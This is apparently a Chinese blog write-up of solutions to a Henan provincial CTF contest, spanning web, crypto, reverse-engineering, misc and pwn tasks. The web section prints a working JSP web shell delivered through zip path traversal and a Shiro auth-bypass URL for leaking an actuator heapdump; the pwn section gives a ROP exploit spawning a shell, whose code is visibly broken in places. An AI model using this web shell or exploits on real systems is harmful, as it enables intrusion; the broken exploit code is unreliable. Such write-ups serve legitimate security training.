河南省第三届金盾信安杯网络安全大赛部分wp
2024-05-08 06:33:28
河南省第三届金盾信安杯网络安全大赛
公众号:Th0r安全
文章目录
- 河南省第三届金盾信安杯网络安全大赛
- Web
- 上传你的压缩包吧
- 休想爆破我
- Crypto
- Hi There
- 低音吉他谱
- 未完成的宣传图
- Reverse
- Re2
- Re3
- Re5
- Misc
- 潦草的笔记
- 这可是关键信息
- hello-world
- Pwn
- pwn2
Web
上传你的压缩包吧
上传之后会解压 zip,上传一个 jsp 马然后压缩传上去:
<%
if ("feng".equals(request.getParameter("pwd"))) {java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int len = -1;
byte[] bytes = new byte[4092];
out.print("<pre>");
while ((len = input.read(bytes)) != -1) {out.println(new String(bytes, "GBK"));
}
out.print("</pre>");
}
%>
再访问会提示不行,应该是 upload 目录不可以,尝试压缩包穿越,拿 010 改:
再上传上去访问 1.jsp 即可 rce,然后读 flag.jsp 即可。
休想爆破我
湖湘杯原题,下载 heapdump 然后其他的操作都和湖湘杯一样了,链接:
https://blog.csdn.net/meteox/article/details/121334507
给了 pom.xml,shiro 版本 1.50,扫描目录发现有/actuator 文件,但访问其中的文件就重定向到login 结合 shiro 鉴权绕过可以成功访问到。
http://f027f9e4.lxctf.net//;/actuator/env
然 后 可 以 下 载 heapdump 文 件 , 可 参 考 文 章 提 取
keyhttps://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.htm找到密钥后进行还原
import base64
import struct
str=base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb',25,56,-57,73,111,12,-81,57,36,114,15, 13,84,-56,-96,-89))
print(str)
然后直接用工具打就行
Crypto
Hi There
密文:Hhbe1cie93bfTFbcc2hl94e2ea1c91rgab5fei3432Tse498
栅栏,经过测试是 8 位偏移
解密出:HiThereTheFlagisb9b91a3ee3c4cb441bce9539cf221f28
flag{b9b91a3ee3c4cb441bce9539cf221f28}
低音吉他谱
拿到密文:
KIYVK6KWIVWE6V3MLJEVEVCOKVKDANKLKVKWIYKRNNJE4VKWOBMFGVLLPFLEK5CPKNWFMSC
WKRHEKUZQGFBVM23IIZLWYUSEKRVUUWCSGFDGCVSFORHFK3DEJJJVISSFKJKTCYKVNNSFMTJRKJ
GFIVTQK5JVKVLZKZCTCT2VNRFEQV3LJJCVIMBVINLFK3CKJVVVMSSUKZYFGURRKV5FERLUJZJWYZC
IKZKEUVKTGAYWCV2VMRHE4RKSJZKFM4CWKIYVK6KSIVLE4V3MKZEFMVCOKVKFKOKLKZVWIWSN
GFLEIVDMJJMFEMKVGBJEK3COKVWFMSKSKRFFKUSVGVKFCMDELJHEKUSQKRKUUWCSGAYHSVSF
ORHVKMCSJBKVM4CFKMYDCQ2WGBWE4TJQKJEFIVTQLFJDCVTBKZCTCUSTNRLEUVSUJJKVIVJVJNL
UKZC2JZDFETSVKZYFOURQKV4VMVKOJ5KTASSIKVVUMVKTGA2WCVRQMRHFO3CSIZKGWTSDKIYD
A6KSIVWFEU3MLJEFKVCOIVJVKNKTK5VWIVSNNNJEYVDLJJKVEMCVPFJEK5CPKNWFUSCWKRFEKU
ZRIZFVMMDIIJGWWVSMKRWE4R2SGFKTAVSFHFHFG3CWJJJVISSVKRKTKU2XKVSFETSGKJGFI3DQL
BJVMRL2KZCUMT2RGBNEQVSUJJKVGVJVMFLGWZCWJUYFMSSUNRFFQURROBCFMRJRKJLWYZCJK
FKEUVKUGA2VIUSVMRLVCVSSJJKGYSSXKIYUK6SSKVSE6ULMJZEFK22GKVJTAOKDKYYGYVSNGBLEQ
VDLJJKVEMKVPFLEK3CPKNWFMSKSKZYEMVCVGVFVORLEMFIVMUSIKQYHAVSTKVVXSUSVGFHVG
3DEJBKWWRSVKRKTKYKWGBSE4TLLKJHFI22KKRJDC4CDKZCXITSTNRLEQVSUJZKVGVJRMFLVKZCWJ
ZDFETSVKZYFQURRIV5FERSOJ5KWYZCIK5VUUVKTGAYVGVRQNRFE2MCSJBKGUSSDKJ5FCMCSIVW
E6V3MMREFMVCKKVJTANLBKZKWGMKRKZJE4VDMJJLFEMKWMFLEMRSPK5WEUSCWKRFEKU2V
GVQVMRLIIJLWYUSQKRVU4RCSGAYWCUSFNRJVG3C2JBJFISSWKEYDKVCRNNSFGUKWKJGFIMCKK
ZJVMVL2KJKWYT2TNRHEQV2UJZKVGMBRJNLFKZC2JUYFEUCUNRYGCURRKZNFMRJRKNJWY2CIKV
KE4VKUKU2VGVJQMRHFOVKSJZKVM4CXKNKVK6SSIVHE6VJQJJEFKVCKKVJDANKDKZKWYTSNNRJE
YVDMJJLFEMKFPFJEK3CTKNWFMSKRKRHEMVCVGFQVM23EKZGWYUSKKRWHAV2TIVKXUVSGJZH
VG3DEJBKVITSVKMYDCU2WGBWEUTLMKJGFI23QLBJDCVJQKZCWITSXNRSEQVCUJZDFGVJVIRJGW
YZQJZDFESSVNRFFMURQGB4VEVLUJZLWYUSIKZLGYVKSGAYUGVSVMRFE23CSIJKGWTSGKIYVK6K
WIVWE6VLMMREVEVCKIZJTAMLBKVVWIVSNGBJFAVCVJJLVEMKGMFLEKTSPKFWE4SCOIZWEKUZQ
HFFVM23EKZGTCUSCKRVXAYKSGFKXSVSFMRHFG3DEJBKFM4CVKQYDKS2WNNSFUTSGKJHFIMCKK
5JHUUL2KJCVMT2TNRUEQVCUJJKVGMBZINLFK3CSJVVVETSUNNFFQURRIV5FMRLUJZJWYUSIKFKE
4VKTKU2UYULLMRLFO3CSJZKVK4CYKIYUK6KWIVSE6VLMKJEFMVTQKVJTANKTKZVWIRSNNRLEIVD
MJZBVEMKKIJLEK5CPKFWFUSKSKRHEMURQGVQVKVLEKJLWYUSOKRKXAVKSGBVXSUSVJZHFO3DE
JBLFITSVKMYDKYKWNNWEMTLLKZGFI23UINJDAMK2KZCXIT2VNRLEUVCUJZCVGMBVINLUKZCSK5
LFETSVKVYFOUT2KF4VMRJRJ5KWY3CIKVKFERKTGA2VGVRQNRHE222SJRKGUSSDKIYVK6KWIVWE
6U3MMREVCVCOKVITANKLKZKWIUSNGBJEYVCWJJLFEMKVPFLEK3CPKUYFESCVNNDFKVBQGVQV
M23EJJGWYUSMKRLHAU2SPJIXUVSFNRIFG3CSJBJVISSGKMYDKYKXKVSFOUKWKJGFI3DQKVJUKVT
BKZDEMT2TNRLEQVKUJZCVIMBRINLGWYZQJUYFETSUNNFFUUT2KF4VERLMKJLWYWSJKFKE4RSS
GA2UGVJQMRQVC3CSJRKFK4CWKIYVK6SSIZDE6VLMJJEFMVCOIVKFMRSTKZCWIVSXNRJE4VDMJJJ
VEMLQINJEKMKPKFWFMSSUKRHEKU2VGR4VC23EKNITCUSOKRWEUVSTKZCXSVSFORHVO3CWJB
HEIUSFKNLEMU2XIVUEMTLMKJHFI3DQKJJDCVLZKJCTCU2RNRUEQVKUJJDFGMBVIRIWWZCWK5W
FEUCUKVFFOURQKV4VMRLEJ5IWY2CIJZCEURKTGAYWCVSVNRLE2MCWIZKGWTSDKIYVK6KWIUYU
4V3MLJEFOVCOIVKVKNKUKEYGIVSXNRJEUVDLOBLVEMLLPFJEKZCPKNWEMSCXNNHFKU2VGVJVM
VLMLJGWYUSEKRVUUV2SGFVTAUSFMRHFO3C2JBKVM4CVKJKTKS2VGBSFGUSFKJGFIVSKKZJUKRT
BKZCXIT2XNRWEQVSUJJKVGVJVMFLGW2CGJUYVEUCUNNYFEURROBBVERJRKJLWYWSIK5KE4RKS
GA2VIUTLMMYE4RKSJJKGY4CXKNKVK6KSIUYU6ULMOBEFO22OIVKFKNKLKYYGYVSXNRJEUVDMO
BNFEMK2IJLEK3CPKVWFMSKSKRHFKVKVGVJVKMDEKZGTCUSIKRKXAVSTKVVXSUSVNRHVC3DMJB
LVIUSFKNLEMS2WGBSFETLMKJHFI22KKRJDCRJQKZCXIT2TNRNEQVSUJJKVCMBRMFLWWZCWK5W
FESCUKZYFKURRKV4VMRSGJ5KWYZCIKZKE4VKUGA4UGVSVMRLE2MCSJRKFM4CSKIYDCWSWIVSF
AULMLJEVCVTQKVJFKNKLKUYGIWSNGBJEUVKWJJKVEMDLPJJFKVSOK5WFESCWKZYFKU2VGVBVM
MDIIJGWWUSEKRVUUYKSPJLEEVSFORHFK3C2JBJFISSVKUYDI6KRNNSFGUJRKJFFI22KK5JDAVTBKZC
U4T2VGBSEQV3LJJKVIVJRMFLEKZCOK5WFEQSUKZYFUURRKZQVMRJRKJJWYZCKKRLHAVKRKU2VG
VLLMRLE2MCSJJKGYSSWKNKTA6SSIVSE6ULMNREFIVTMIVJDANKDKZVWQRSNGBLEMVDMJJMVE
MBQPFLEK5COK5WGISSUKRFEKUZQGVKFC23EKZGWYUSKKRVXAVSTKZKXSVSVJZHVK3CKJBKFM4
CVKNKTKU2WNNSEMTLLKZDFI23QKZJDC4CDKZCVMUSVNRNEQTSEJJCVGMBRMFKWWZCTKFWFE
TCUNRFFQU2WKV4VMRJRJ5IWYVSIKZKFEVKTGA2UGVRQNBBE2MKSKBKGW4CXKIYVK6KSIUYU6U
LMLJEVEVCKKVJDANKDKYYGGMCXKVJFAVKVOBMFEMDLPJJFKZCPKFWE4SCXNNHEKU2WJJBVMM
DMIZGWYUSMKRLHAV2SGFLGCUSFORHVO3CSJBIVITSVKVKTKRCSGBSE4V2WKJGFKVLQK5JDCRLZ
KJKTCT2RNRNEQV2UJJCVIMKGJNLFK3CSK5WFERSUNNHEGURRNMYFERLMKJLWYWSJKFKE4RKUG
A2WCV2VMRLE2MKSJJKGW4CZKJ5FC6SSKUYU6VLMMREFO22GKVKDANKDKZVWIRSNNRJEIVCW
OBKVEMKKIJLEK5CPKVWFMSSWKRFFKUZQGVFVKMDEKNITCUSOKRVUUWCTIVKXUVSFNRHVO3C
WJBLFITSFKQYUMS2WIVSEETJRKJKFI3CKKVJDCRTBKZCXITSVNRNEQV2UJZCVIVJVKRJEKZCOJVVVET
SVKZFFQURQGB4VERLUJ5KWY3CIKVKFERKTKZFEWVTLMRLE222SKRKFM4CXKIYVK6KWIVWE6V3
MLJEFOVCOIVJTANKTKZVWIYKRGFJFAVCVJJMFGVKVPFLEKMKPKFWGISCXKRJEKURQGVBVMMDEJ
JLWYUSGKRVUUWCSGAYHUUSFORHVG3DEJJKVITSGKJKTCYKXKVSFMTLLKJHFIMDQKVJDARL2KZD
EMT2TNRDEQVCWOBKVGMBVKNLFK3C2JUYFERCUKZYFGURRKZQVERLMJ5IWYZCIKZKEUVKUKU2
UGVJQMRJE4RSSJRKDA4CXKJ5FC6KWIUYU6VLMNREFMVCOIVKFMRTBKZCWIUSNGFJFIVDMJJLFE
MLQIRLEKOKOKFWGISSUKRFFKU2VGVBVORLELJHEKUSOKVLHAWCSGAYHSVSFGFHVO3CGJBLVIUS
FKNKTSS2WIVSEETLLKZCFI23QKRJDCVTBKZCTCUSTNRLEUVSUJJKVIVJVJNLGWZCSK5WFESSUNRFF
OURQKV5FERKOJ5JWY2CIKVKE4RKTKZDFGVTLMRNE23CSJZKGYTSFKIYXARCSIUYU4VLMMRFFKVC
KKVKTANKUKJKWIVSOIZJFAVKVOBLVEMDLPFJEKVSPKNWFMSCUKZWFKU2VGFJVMMDIIZGWYUSQ
KRWE4RSSPJITAUSFMRHFG3CWJJJVM4CVKFKTKRCSNNSFMTJQKJHFI23QLBJVKVTBKZDEMT2XNR
HEQVSUJJKVGVJVMFLDA3COJUYFEUSUNNYFKURRKUYFERLMKNJWYWSIKVKEURSTGA2UWVTLMR
NE222SJJKFK4CWKNLFMYKWIVDE4V3MIZEFIVCSIVKFKMLBKZVWQQSXNRJEYVDLOBNFEMKWMFL
EKMKTKNWFESCWKRFEMU2VGVFVK23EMFIWWUSQKQYEUV2TIVCXSVSGIZHU222KJBKFISSVKIYD
SQ2WNNSEUV3MKJCFI22KKRJDC4CDKZCWYUSVNRLEQVKUJJCVCMBVMFLWWZCWJZDFETSVNNY
FQU2FIV5FMRLEJ5KWYUSIK5VU4VKUKU2UGVSVNBBE23CWIRKGUSSDKIYDAMCWIUYVGVLMLJEF
MVCOIZJDANKUKEYGITSNGFJE4VCVOBLVEMBQPJJEMRSPKNWGISCWKZYFKU2VGVBVMMDEKJLW
YUSOKRWEUU2SPJLEEVSFMRIFG3C2JBJFISSWKEYDKS2WIVSFOUKWKJDFKVSKLBJDC232KJKWYT2
RGBFEQVSUKJCVGMBVKNLGWYZQJUYVESCUKZYGCURRKZQVMRLMJ5IWYZCJKFKE4VKUKU2UWVJ
QMRQVCVSSJJKVK4CXKIYEK6KWIVHE6ULMKZEFMVTQIVJVKNKLKYYGIUSNNRJE4VDMOBJFEMKFP
FLEKMKPKFWFUSCVKRHEKVKVGVFVK23EKZGWYUSKKRWHAV2TIVKXUVSGJZHVG3DEJBHFKRSVK
MYUMS2WGBWEUTLMKJKFI22KLJJDAMDZKZCWYUCRNRSEQVCUJZDFEMBVKNLEKZCOJUYVETCU
GBYFOUT2KF5FMRLMJ5LWY2CIKZKFEVKUKZFEWVTLMRNE2MKSJZKGW4CUKIYVK6KWIVSFAU3M
LJEFOVCKKVJVKMLBKVVWIUSNNRJFAVBQOBLFGVTLPFLEKMKPKFWEUSCOIRFEKUZQGVFVMMDM
JZGWYVSEKRWE4RCSGFKTAVSFORHVC3DEJFIVISSFKMYDKU2WNNSE4V2WKJFFK23QLBJVK23ZKZ
CXIT2TNRNEQVCWNRKVGVSKJNLDAZCGJVVVETCUNNFFOURROBBVERLUJZKWYVSIKVLHAVKVKUY
WCVSFMRLE23CSJBKFM4CZKJ5FC6SSKUYU6VLMLJEFMVCOIVKFKOKDKZVWIRSNNRLEIVDLJJMVE
MLMMFLEKOKPKFWFUSCTKRHEMU2VGVBVO23EJZLVMUSMKVKXAVSSGFKXUUSFMRHFO3C2JBL
FM3CVKRLEUS2WGBRTATJRKJDFI22OI5JHUVSCKZCWITSTNRNEQVCUJJDFCMBVKRJEKYZQK5KVES
CUKVYFOU2VKV4VERLUJ5LWYRSIKZKE4RKTKZFEGVSFMRDE2MCWIZKGY4CWKIYVK6KWIVWE6U3
MKZFFMVCOIVKVKNKLKZVWIYKRNNJEUVDMJJMFEMCVPFLEKTSPKUYE4SCXNNFFKU2WIZQVM23
ELJGWWUSMKRLHAU2SGFVXUVSFGFHFK3CWJBHEM4CVKUYDKQ2WKVSFMV3MKJHFK23QK5JDC
VTBKZCVMT2TNRLEQTSVIZKVGMKGJNLFK3CKJVVVMTCUKZYFEURQGAYFMRLUJ5KWYVSJKJKEUVK
UKU2UGVJQMRJE222SJZKFK4CWKIYVK6KSIUYU6VJQKJEFMVTMKVJDAMKLKZKWIWSNGFJEUVDM
JJLVEMKVPJLEKMKQKFWFMSSWKRFFKUKVGVFVM23EKZLWWUSKKVWEUV2TKVKXUUSVNRHVG3
COJBLVITSFKRKTCS2WKVSFMTJQKJEFIVSOIRJDCVL2KJCWITSRNRJEQUSUJJKVCVJVIRITAZCWJVVVE
TCUNRFFOURQKV4VEVKOJ5IWYUSIJZCEURKTKZDEWVTLMRFE222SKBKGWSSXKIYDCYKWIUYU6VL
MKZEVCVCKKVKFKNKUKJCWIVSNNRJEUVDLJJMFGVLLPJJFKTSPKVWFMSCWKRHFKUZRIZFVM23MI
ZGTAUSEKRVXAWCSGFLFUVSFHFIFC3C2JBIVITSGKNKTKS2VNNRTATSGKJGFKVLQK5JDCVTBKZCU4T
2VGBSEQVSUJJKVGVJVJNLFK3CWJUYFMTSUNNYFGURRKV5FMRLUJ5KWYVSIKZKE4RKSGA2UGVSV
MRLE2MCSJJKGYSSXKNCVK6KSIUYU6VLMNREE4RTMKVJTANKDKZVWIUSXNRJEIVCWOBQVEMKVP
FJEKMKSKVWFMSCTKRHFKUKVGVFVKVLEJZLVKUSIKQYHAV2TIVKXSVSFMRHVG3C2JBKFM3CVKMY
DCYKWNNSFMV3MKJCFI22KKRJDC4CDKJCTCTSTNRNEQTSEJZKVCVJVKNKWWZCWJUYFETCUGBFF
SURQGFQVMRKWJ5JWYUSIKZLHAVKUKU4UGVTLMRDE222WIZKFM4CVKIYWYYKWIU4U6V3MKZF
FOVTQKVIVKNLBKZKWIWSNGBJEYVDLOBLFEMKVPJJEMRSPKMYEUSCWKZYFKVCWIZFVMMDEKJG
WYUSIKRWEUVKSGFYEEVSFORHFK3C2JBJFISSWKEYDKVCRNNSFEV2WKJDFKVSKK5JDAMDZKZCTS
T2TNRHEQVSWOBCVGVSKJNLGWZC2JVWFEVCUNRYFSURRKV4VERJRKNJWYVSIKNKEURKTGA2U
WVTLMRNE4RSSKBKGWSSWKNLEK6SSIVSE6VJQKZEFOVCSIVKDANLBKYYGIUSNNNJEYVDMJZEFE6
SWIJLEK5CPKVWFUSCXKRFEKUJQGVJVOVLEKZGWYUSKKRVXAVSTKZKXUUSGIZHVG3C2JBLFITSFK
MYUMS2WNNUEETLMKJBFI23QKVJDCVJQKZCTSUCTNRNEUUSWOBKVCVJVKNLVKZCSJUYVETCUK
ZYFMUT2KF5FEVLEJ5LWY3CIKZLHAVKTGA2UWVSVMRLFO22WIZKGW4CYKJ5FMQSWIU4U6ULMK
ZFFGVCKIZJVKMLBKVVWIVSNGBJE4VCVOBLFGVLLPFLEKMKPKFWE4SCXNNHEKU2WJJBVMMDMJZ
GTAUSIKRLHAV2SGFLFUVSFMRHFG3CWJBLFITSGKNKTKRCSKVSFETSFKJFFIVSKK5JDA23ZKJDE4TSX
NRHEQVCUJJKVIMBVMFLGWZCSJUYFMSSUNNHEMURQGFQVERLUJ5IWYWSIJZDHAVKTGA2VGVT
LMRLE2MCSJRKGW4CZKJ5FC6SSKVLE6UJQLJEFMVCOIVKDAMKDKZVWIRSNNRLEIVDLOBKVEMK2I
JLEKVSSKVWGISCWKRFFKVBQGVBVMMDELJLVMUSMKVKXAVKSGBCXSUSFGFHVK3C2JBLFISSVKQ
YUMS2WKVSFUTLMKJIFI22OI5JDC4CDKZCWYT2VNRNEQUSUJJKVCMBVKRIWWZCOJZDFETSUKVY
FOURQIZQVMRKGJ5LWYRSIKZKE4VKUKUYWCVRQNRJFO3CSJJKGYTSEKIYVK6KWIVWE6V3MKZFFK
VCOKVKVKNKEKEYGGMKRKZJEQVCVOBLVE6SRPFLEMRSPKUYEUSCVNNDFKU2VHFBVM23EIZLWY
USGKRVXAVCSGAYVUVSFORJFG3CWJBLFITSVKIYDCVCRGBSFMV3LKJIFIMDQK5JVKVL2KJCXIT2VNR
HEQVCWOBCVIMBRINLFK3C2JUYFERCUKZYFEURQGFNFMRJZJ5LWYWSIK5KE4RSSGA2UGVJQMRJ
E4RSSJZKFK4CZKNKVK6KSKV2E6V3MJJEFMVCOIVKDCRSLKZCWIRSNGFJEYVDMJJKFE6SWIJLEK5CS
KNWFUSSSKRFFKUSVGVFVMVLEKZLWWUSOKVKXAWCSGFVXSUSFORHVK3CSJBLWWSSVKNLEUU
2WKVSFMV3MKJKFI22KKNJDCVJQKZCTSUSTNRSEQVCUJZKVIMBVIRIWWZCSJZCVETSVKZFFKU2WI
U4VAVBQHFIFIMB5
按照顺序进行:
base32 解码, base64 解码,base32 解码,base16 解码,base64 解码,发现:
Pf0>IdQ5OcQBF@uY&UjKJ3UPyO<p@xZ%s}pHFHiqIA>W;J3UZ)Pf2Vsbx%7bM=DQ6a6v*)XHZjMPe
&~yaZfENPI^yBPB?Z?J9R`pPe@K|bWb~Tds<FyKs|O*Lo;+cPf2W6d`@X2B{ooIYj18-GC4z9Pf2TddQ
V7rcr8#wC@O1Ab7UiOPiaJXSW;R(VmnW0QFCKYJ7Rq%Pf2SbZBkbzYfMgUKx`#YXGVQ3PHjLTDNR
pEMp#cqeo|LZV|{K^Pe@HZVNzjGKw3_1Kq+%iNkM%*PHkR6BTqXdHEB>qN@HwOdND~qPf0>IU
r|FdR&z~1dR1mmJ0xIuPHQD=K~W}lD{M|_d_+i7H8@#4Pc3CCZ%s}<J9tiQKp}8bH9JQ#PCYkqP)9~ XMKVuCa8pQ7XHZsnPf259Em1;VS8Gs3ba-x1XL(~;PCrU5DMv+mW=2p$U~^$pHG5B9Pe^zzcTXxo
azRi<N-1?uNkTCyPHaeaV^2vzeLheqZa#BQJ3UP!PiaJUYfnf&c4AOPbZlu+CUz?+PiaIsS5G@7M<q~ WJ~LBLW_>|GPe(02bxlrwGg?hRY;i(UH7zk?Pe&~~bWUk=H8oF2O@4DuZDu8PPf2W6d`~GrW;akp
buoEOUOQ29P-RVda8D{SdQMMhA$D?7S|(yXPdg-Fb5dG9Bx+7=R&ZudJU3Y-PCaRAZBIKTM`loCJu
6O6J7OU!PChAeCQmyhM=DNfd_hG>WMO)5P$+IDa7|ueP9#ufYiT1>d2eMhPChAeDp5E`XjM=}N
@i?OXIMRSPdijZU{6I(P+w0;K_PHYJ7Rr4Pf0>IdQ5V0NpDR+LrhptJ3UP!PCaQVW=&2gHFHiqIA>W;J
3UZ)Pf2W9CQ&0pQ#npNc6Mn^UL$5ZPe&~yaZgA^S1V6QPB?Z?JVrn$Pc1+=V^2GCdudK>G&^ojN
kMpVPHk3jW=no6YE4c|G%8O@c70$y
再进行 base 一把梭得到 flag:380a4d5bea49d6a00921d4ed26b9d4ab
flag:flag{380a4d5bea49d6a00921d4ed26b9d4ab}
未完成的宣传图
打开 20211125.tmp 文件,发现全是坐标
联想提示:设计师离职,交接当前未完成的工作,其中需求为: 1. 宣传图需要
重新设计为矢量图 2. 添加联系方式的二维码
采用 matplotlib 绘图脚本,将文件改动样式并放到 txt 文件中
脚本:
import matplotlib.pyplot as plt
import numpy as np
x, y = np.loadtxt('C:/Users/lenovo/Desktop/1.txt', delimiter=',',
unpack=True)
plt.plot(x, y, '.')
plt.show()
结果为二维码
微信扫码得到 flag
flag{1e52c4c05dcff5fcc54b64e21bcbdc9e}
Reverse
Re2
- 看一下 main 函数
先找一下逻辑
这个 call 很不正常,看一下,是一个函数,main 函数是他的参数
然后这一串也很可疑,查看一下,大致就是先运行 main 之前的函数,然后一顿操作(rc4,异或,base 变种 - 运行程序看一下,能看到有一个时间提示,但是是个假时间,真的。。。。
- 脚本爆破
#include <stdio.h>
#include <stdlib.h>
int main() {for (int i = 1609448160; i < 1671742560; ++i) {int seed = i;
srand(seed);
if (rand() == 1515432825) {printf("%d\n", seed);
break;
}
}
return 0;
}
- 爆一下 seed 值,直接修改 eax 的值为 seed 的值,然后选择好解密的位置创建一个解密函数即可
for (i = 0; i <= 41; ++i) {a3 = *(&key1ptr + i) ^ *(i + a1);
if (a3 != *(&key2ptr + i))
break;
}
result = i;
v5 = __readfsqword(0x28u);
v4 = v5 ^ v91;
if (v5 != v91)
result = (unk_559E)(a1, a2, a3, v4);
return result;
}
创建的函数省略(因为创建的变量太多,只留下最后的关键部分)正向顺序解密有点麻烦,因涉及到随机异或(好吧,是我太烂了)把上面的 key1 和 key2 提取出来做一下异或,直接出 flag
key1 = [61, 159, 9, 29, 146, 126, 169, 130, 106, 19, 233, 31, 142, 51, 80, 143, 113, 7, 29, 251, 28, 209, 237, 15, 152, 82, 22, 39, 215, 245, 155, 56, 89, 220, 239, 87, 82, 180, 252, 235, 117, 11, 91, 243, 104, 122, 233, 77, 203, 225, 93, 39, 217, 126, 187, 30, 103, 187, 21, 62, 48, 207, 126, 225, 136, 34, 249, 102, 115, 23, 250, 150, 250, 94, 111, 236, 214, 53, 101, 215, 205, 136, 69, 118]
key2 = [91, 243, 104, 122, 233, 77, 203, 225, 93, 39, 217, 126, 187, 30, 103, 187, 21, 62, 48, 207, 126, 225, 136, 34, 249, 102, 115, 23, 250, 150, 250, 94, 111, 236, 214, 53, 101, 215, 205, 136, 69, 118]
str = '' for i, _ in enumerate(key2):
str += chr(key1[i] ^ key2[i])
print(str, end='')
Re3
原题,参考链接:https://blog.csdn.net/dyllove98/article/details/9018453
SSE4.1 指令集中的指令及其在视频编码中的应用。 整数格式转换,例如,把一个 8 位的字节型变量转换为 16 位字变量,或者 32 位的双字变量等。这种运算在图像,语音信号处理中的经常碰到。例如,图像数据是 8 位的字节 型变量,如果运算过程中的浮点变量定点化采用的 Q15 格式,则需要将 8 位无符号扩展为 16 位以适应 SIMD 的并行运算,如果为了更高的精度,Q15 格式显然太低,例如采用 Q24 是一个不错的选择,这时候需要将 8 位无符号扩展为 32 位双字变量以适应 SIMD 的并行运算。
SSE4.1 提供了 12 条不同的指令来完成各种不同整数格式之间的转换。运动估计占视频编码 30%以上的时间,采用 SSE 的 SIMD 指令可有效加速
运动估计的计算过程
int blockMatch4x4(const unsigned char* refFrame, int stepBytesRF,
2 const unsigned char* curBlock, int stepBytesCB,
int* matchBlock,
3 int frameWidth, int frameHeight)
4 {5
6 int lowSum = INT_MAX;
7 int i,j,k,l;
8
9 int temSum = 0;
10
11 int blockHeight = 4;
12
13 int blockWidth = 4;
14
15 const unsigned char *pRef, *pCur;
16
17 for (i = 0; i <= frameHeight - blockHeight; i++)
18 {19 for (j = 0; j <= frameWidth - blockWidth; j++)
20 {21 temSum = 0;
22 pCur = curBlock;
23 pRef = refFrame + i * stepBytesRF + j;
24
25 for (k=0; k < 4; k++)
26 {27 for (l=0; l < 4; l++)
28 {29 temSum += labs(*pRef-*pCur);
30 pCur++;
31 pRef++;
32 }
33 pCur += stepBytesCB - 4;
34 pRef += stepBytesRF - 4;
35 }
36
37 if (temSum < lowSum)
38 {39 lowSum = temSum;
40 *matchBlock = j;
41 *(matchBlock+1) = i;
42 }
43 }
44 }
45 return 0;
46
a = [
0x19, 0x13, 0x1E, 0x18, 0x04, 0x31, 0x14, 0x26, 0x4F, 0x32,
0x2B, 0x32, 0x4B, 0x31, 0x2B, 0x36, 0x4E, 0x32, 0x14, 0x36,
0x06, 0x32, 0x2A, 0x2D, 0x3B, 0x2D, 0x15, 0x2E, 0x4E, 0x30,
0x3A, 0x26, 0x4A, 0x30, 0x3A, 0x2E, 0x4F, 0x2]
for j in range(len(a)):
print(chr(127^a[j]),end='')
flag{NkY0MTM4NTI1MkIyMURDRjQ1OEY5OEQ0}
Re5
re6
拿到附件,先运行看一下,没回显,进工具查一下壳,32,无壳
主函数里面没有明显的核心代码,但是他有一个输入函数,跟进调试一下,最后调了一会,确实输入不是在 main 函数,接下来就找其他的输入函数
可以看到这里还有一个输入函数,再试一下,就是一个亦或提取他的字符串,直接码脚本就行了
脚本
e='Vm0weGQxSXhiRmhUV0doV1YwZDRWRmxVUW5KWl'
d=[0x30,0x01,0x51,0x10,0x1E,0x1E,0x05,0x32,0x04,0x16,0x3D,0x50,0x20,0x0
9,0x5B,0x39,0x0E,0x52,0x33,0x07,0x24,0x68,0x35,0x25,0x29,0x0A,0x04,0x06,
0x2B,0x09,0x30,0x18,0x00,0x1A,0x63,0x3B,0x10,0x11]
for i in range(len(e)):
print(chr(ord(e[i])^d[i]),end="")
Misc
潦草的笔记
一张被二维码遮盖的图,脚本跑,不对,发现上面的命令是可以猜测出来的
/usr/bin/head -n 1 /etc/passwd | /usr/bin/awk - F:’{printf $1}’ | /usr/bin/
linux 的命令,联想到 password 密码,猜测为 md5 编码类型,linux 中最高密码权限一般默认为 root,然后对 root 进行 md5 加密 ,出来的结果刚好跟图片中对应
flag{ 63a9f0ea7bb98050796b649e85481845}
这可是关键信息
根据给出的提示:qingtengwglab@ctf.com,在 github 上社工下发现发布了东西,链接:https://github.com/p1n93r/qingteng-wblab/blob/0490a4b62339020331624c22e3e5fc6a1ca3e8c4/qingteng-wglab/README.md
然后发现一个解释,迷迷瞪瞪的
不对,然后往前看了下发现一张 gif 图片 logo.gif 和一个 README.md,记事本打开图片,发现 flagflag{0b6db90034ac4494956679a100e236fc}
hello-world
在图片属性值发现 hex 编码
密文:
666c61677b35383561626436653435316134623466393665636630343036303136376264397d
进行 hex 解码得到
flag:flag{585abd6e451a4b4f96ecf04060167bd9}
Pwn
pwn2
Checksec 后直接 gdb
有个栈溢出
Exp
from pwn import * p = process('./babystack')
context(arch = 'amd64',log_level = 'debug')
puts_got = elf.got['puts']
elf = ELF('./babystack')
puts_plt = elf.plt['puts']
pop_rdi = 0x0000000000400813
leve_ret = 0x0000000000400701 # leave ; ret
ret = 0x000000000040053e
read_plt = elf.plt['read']
main = 0x400677
pop_rsi = 0x0000000000400811 # pop rsi ; pop r15 ; ret
p.recvuntil('name\n')
final = 0x00609000 - 0x200
final2 = final+0x100
payload = b'a'*(5+8)
+p64(final)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(
final)+p64(0)+p64(read_plt)+p64(leve_ret)
payload = payload.ljust(109,b'b')
p.send(payload)
p.recvline()
puts_addr = u64(p.recvuntil('\n')[:-1].ljust(8,b'\x00'))
log.info(hex(puts_addr))
libc_base = puts_addr - 0x80aa0
gadget = libc_base + 0x4f3d5
system = libc_base + 0x4f550
bin_sh = libc_base + 0x1b3e1a
payload2 = p64(final1,p64(pop_rdi)+p64(bin_sh)+p64(ret)+p64(system)+p64(read_plt)+p64(final1)+p64(0)+p
64(buf2)+p64(100)
p.sendline(payload2)
p.interactive()
河南省第三届金盾信安杯网络安全大赛部分wp相关推荐
- 河南省第四届”金盾信安杯”网络安全大赛writeup(过程,解题思路)
目录 写在最最前面 Misc Misc-qianda0_Sdoku编辑 Misc-盗梦空间 Misc-Megmi Misc-数据泄露01-账号泄露追踪 Web Web-eZphp2 Web-EzPH ...
- 河南省“第三届金盾信安杯“部分WP
河南省"第三届金盾信安杯"部分WP Crypto Hi There 下载文件,打开发现一串字符,搜索在线栅栏解密,每组字数为4得到flag 低音吉他普 工具(base全家桶):ht ...
- data:image/png;base64,, CTF杂项base64图片隐写-河南省第二届金盾信安杯
